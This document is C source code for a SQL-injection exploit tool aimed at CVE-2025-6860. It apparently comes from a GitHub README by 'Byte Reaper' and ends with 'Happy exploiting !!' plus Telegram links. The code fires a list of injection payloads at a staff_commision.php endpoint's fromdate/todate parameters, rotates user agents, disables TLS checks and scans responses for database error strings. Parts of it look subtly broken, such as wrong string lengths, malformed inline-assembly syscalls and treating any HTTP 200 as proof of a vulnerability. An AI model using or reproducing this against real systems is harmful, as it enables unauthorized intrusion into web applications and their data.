README.md
Rendering markdown...
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include "argparse.h"
struct Mem
{
char *buffer;
size_t len;
};
const char *p[] =
{
"' OR 1 -- -",
"\" OR \"\" = \"",
" OR 1 = 1 -- -",
"' OR '' = '",
"AND 1",
"AND 0",
"AND true",
"AND false",
"1-false",
"-1 UNION SELECT 1 INTO @,@,@",
"admin' or '1'='1",
"admin' or '1'='1'--",
"admin' or '1'='1'#",
"-",
" ",
"&",
"^",
"*"
};
const char *sq[] =
{
"syntax error",
"Warning: mysql_fetch_assoc()",
"Warning: mysqli_query()",
"SQLSTATE",
"Invalid query",
"Unclosed quotation mark",
"quoted string not properly terminated",
"You have an error in your SQL syntax",
"Warning: pg_query()",
"Warning: pg_send_query()",
"pg_query(): Query failed",
"Microsoft OLE DB Provider for SQL Server",
"Incorrect syntax near",
"Unclosed quotation mark after the character string",
"SQL error",
"mysql_num_rows() expects parameter",
"mysql_fetch_array() expects parameter",
"Fatal error",
"mysql_fetch_object() expects parameter",
"mysqli_fetch_assoc() expects parameter",
"mysql_fetch_row() expects parameter",
"supplied argument is not a valid MySQL",
"Warning: mssql_query()",
"syntax error at or near",
"org.hibernate.exception",
"unexpected end of SQL command",
"SQL query failed",
"database query error",
"DB2 SQL error",
"OLE DB provider returned message",
"JDBC SQL error",
"pg_fetch_array() expects parameter",
"pg_fetch_assoc() expects parameter",
"Query execution failed",
"Database error",
"Unhandled Exception",
"ORA-00933: SQL command not properly ended",
"ORA-01756: quoted string not properly terminated",
"SQL Server Error",
"mysql_numrows() expects parameter",
"mysql_num_fields() expects parameter",
"Syntax error or access violation",
"SQL syntax error",
"NativeError",
"ODBC SQL Server Driver",
"Warning: odbc_exec()",
"Warning: odbc_prepare()",
"Fatal error: Call to a member function",
};
const char *a[] =
{
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36",
"Mozilla/5.0 (Linux; Android 4.4.2; SM-P600 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36",
"Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36",
"Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0"
};
size_t write_cb(void *ptr,
size_t size,
size_t nmemb,
void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer,
m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]),
ptr,
total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
void g(CURL *curl)
{
static int c = 0;
static int nma = sizeof(a) / sizeof(a[0]);
const char *us = a[c];
c = (c + 1) % nma;
curl_easy_setopt(curl,
CURLOPT_USERAGENT,
us);
}
void sd(const char *u)
{
const char *m1 = "\e[1;32m[+] Don't forget to put a correct link consisting of the parameters that suffer from the vulnerability.\n";
const char *m2 = "\n\e[1;32m[+] which are fromdate and todate.\n";
const char *sk = "\n\e[1;37m-------------------------------------------------------------------------------------------------------------------\n";
const char *m3 = "\n\e[1;34m[+] Exploitation of CVE-2025-6860 has begun...";
size_t l1 = strlen(m1) - 1;
size_t l2 = strlen(m2) - 1;
size_t l3 = strlen(m2) - 1;
__asm__ volatile
(
"xor %%rax, %%rax\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[m1], %%rsi\n\t"
"mov %[l1], %%rdx\n\t"
"syscall\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[m2], %%rsi\n\t"
"mov %[l2], %%rdx\n\t"
"syscall\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[m3], %%rsi\n\t"
"mov %[l3], %%rdx\n\t"
"syscall\n\t"
:
: [m1] "r"(m1),
[l1] "r"(l1),
[m2] "r"(m2),
[l2] "r"(l2),
[m3] "r"(m3),
[l3] "r"(l3)
: "rax","rdi","rsi","rdx"
);
CURL *curl = curl_easy_init();
if (curl == NULL)
{
const char *i = "/sbin/ifconfig";
const char *argv[] = {NULL, i};
const char *v = {NULL};
const char *e1 = "\n\e[1;31m[-] Error Create Object Curl, Please Check Your Connection\n";
const char *e2 = "\n\e[1;31m[-] Exemple Command : ping google.com / ifconfig \n";
const char *e3 = "\n\e[1;36m[+] Start Command ifconfig For check Ip And Connection...\n";
size_t el1 = strlen(e1) - 1;
size_t el2 = strlen(e2) - 1;
size_t el3 = strlen(e3) - 1;
__asm__ volatile
(
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[e1], %%rsi\n\t"
"mov %[el1], %%rdx\n\t"
"syscall\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[e2], %%rsi\n\t"
"mov %[el2], %%rdx\n\t"
"syscall\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[e3], %%rsi\n\t"
"mov %[el3], %%rdx\n\t"
"syscall\n\t"
:
: [e1] "r" (e1),
[el1] "r" (el1),
[e2] "r" (e2),
[el2] "r" (el2),
[e3] "r" (e3),
[el3] "r" (el3)
:"rax", "rdi", "rsi", "rdx"
);
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[i], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[v], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
: [i] "r"(i), [argv] "r"(argv), [v] "r"(v)
: "rax","rdi","rsi","rdx"
);
}
char f[2043];
CURLcode r;
struct Mem chunk = {NULL, 0};
int np = sizeof(p) / sizeof(p[0]);
for (int k= 0; k < np ;k++)
{
if (curl)
{
const char *fp = p[k];
snprintf(f,
sizeof(f),
"%s/panel/staff_commision.php?fromdate=%s&todate=%s",
u,
fp,
fp);
curl_easy_setopt(curl,
CURLOPT_URL,
f);
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com/");
h = curl_slist_append(h,
"Cache-Control: no-cache");
h = curl_slist_append(h,
"Pragma: no-cache");
struct timespec req = {0};
req.tv_sec = 0;
req.tv_nsec = 500000000;
long ret;
__asm__ volatile
(
"mov $35, %%rax\n\t"
"mov $1, %%rdi\n\t"
"xor %%rsi, %%rsi\n\t"
"syscall\n\t"
"mov %%rax, %0\n\t"
: "=r" (ret)
: "r" (&req)
: "rax", "rdi", "rsi"
);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
g(curl);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&chunk);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
__asm__ volatile
(
"mov $35, %%rax\n\t"
"mov $1, %%rdi\n\t"
"xor %%rsi, %%rsi\n\t"
"syscall\n\t"
"mov %%rax, %0\n\t"
: "=r" (ret)
: "r" (&req)
: "rax", "rdi", "rsi"
);
r = curl_easy_perform(curl);
if (r == CURLE_OK)
{
long ht = 0;
printf("[+] Target URL : %s", u);
const char *s = "\e[1;34m[+] Request Send Success !\n";
size_t sl = strlen(s) - 1;
__asm__ volatile
(
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[s], %%rsi\n\t"
"mov %[sl], %%rdx\n\t"
"syscall\n\t"
:
: [s] "r" (s),
[sl] "r" (sl)
:"rax", "rdi", "rsi", "rdx"
);
printf("\e[1;34m[+] FULL URL : %s\n", f);
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&ht);
printf("\e[1;32m[+] HTTP CODE : %ld\n", ht);
if (ht == 200 || ht == 201 || ht == 202 || ht == 203 || ht == 204 || ht == 206)
{
int csq = sizeof(sq) / sizeof(sq[0]);
int found = 0;
printf("\e[1;34m[+] The payload was successfully responded to by the server !\n");
printf("\e[1;34m[+] The server has an SQL vulnerability !\n");
for (int key = 0; key < csq ; key++)
{
if (strstr(chunk.buffer, sq[key]) != NULL)
{
found = 1;
break;
}
}
if (found)
{
printf("\e[1;34m[+] A suspicious word was found in a response !\n");
printf("\e[1;34m[+] The server suffers from a CVE-2025-6860 vulnerability !\n");
curl_slist_free_all(h);
}
else
{
printf("\e[1;31m[-] No suspicious patterns found in the server response, vulnerability CVE-2025-6860 not detected.\n");
printf("\e[1;33m[!] Try to make sure that the link is correct and you can access it.\n");
curl_slist_free_all(h);
}
}
else
{
printf("\e[1;31m[-] Http Code Not 200 !\n");
printf("\e[1;32m[+] HTTP CODE : %ld\n",
ht);
printf("\e[1;33m[!] Please Check Your Connection on Server !\n");
printf("\e[1;33m[!] Exemple Command Check Access Connection : ping target.com\n");
curl_slist_free_all(h);
}
}
else
{
fprintf(stderr, "\n\e[1;31m[-] curl_easy_perform() failed: %s\n",
curl_easy_strerror(r));
exit(1);
}
}
}
free(chunk.buffer);
curl_easy_cleanup(curl);
}
int main(int argc,
const char **argv)
{
printf(
"\e[1;31m"
" ⢀⣠⣤⣶⣶⣿⣿⣿⣿⣿⣷⣶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣶⡿⠿⢿⣿⣶⣶⣤⣄⡀⠀⠀⠀⠀⠀\n"
" ⠀⠀⠀⠀⠀⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠞⠋⠉⠀⠀⠀⠀⠀⠀⠀⠉⠛⢿⣿⣷⣄⠀⠀⠀\n"
" ⠀⠀⠀⣠⣾⣿⣿⣿⣿⠿⠛⠉⠁⠀⠀⠀⠀⠉⠙⠻⢿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣶⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣄⠀⠀\n"
" ⠀⠀⣼⣿⣿⣿⡿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣷⡀⠀⠀⠀⢀⣶⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣧⠀⠀\n"
" ⠀⣼⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣿⣄⠀⠀⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣧⠀ \n"
" ⢸⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⢂⣾⣿⣿⣿⠿⠛⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ \n"
" ⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⡿⢡⣿⣿⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿ \n"
" ⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣱⣿⣿⣿⡿⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⡇ \n"
" ⢿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⡟⣴⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⡇ \n"
" ⠸⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠏⢸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿ \n"
" ⠀⢻⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⡿⠃⠀⠀⠹⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⠃⠀ \n"
" ⠀⠀⠹⣿⣿⣿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⣿⠟⠁⠀⠀⠀⠀⠈⢻⣿⣿⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⡿⠃⠀⠀\n"
" ⠀⠀⠀⠈⠻⣿⣿⣿⣿⣶⣤⣀⣀⠀⠀⠀⣀⣀⣤⣶⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣶⣤⣀⣀⠀⠀⠀⢀⣀⣤⣶⣿⣿⣿⣿⠟⠀⠀⠀\n"
" ⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀\n"
" ⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠛⠻⠿⠿⠿⠿⠿⠟⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⢿⣿⣿⣿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"\e[1;37m\t\t\t\t\t@Byte Reaper\n"
);
printf("\e[1;37m=> My Telegram : @ByteReaper0\n");
printf("\e[1;37m=> My Group : https://t.me/exploiterX0\n");
printf("\e[1;34m[+] Happy exploiting !!\n");
printf("\e[1;37m-------------------------------------------------------------------------------------------------------------------\n");
const char *u = NULL;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&u,
"Enter Target URL"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!u)
{
printf("\e[1;31m[-] Please Enter Target URL !\n");
printf("\e[1;33m[!] Exemple : ./exploit -u http://target.com/panel/staff_commision.php?fromdate=&todate=\n");
__asm__ volatile
(
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}
else
{
sd(u);
}
return 0;
}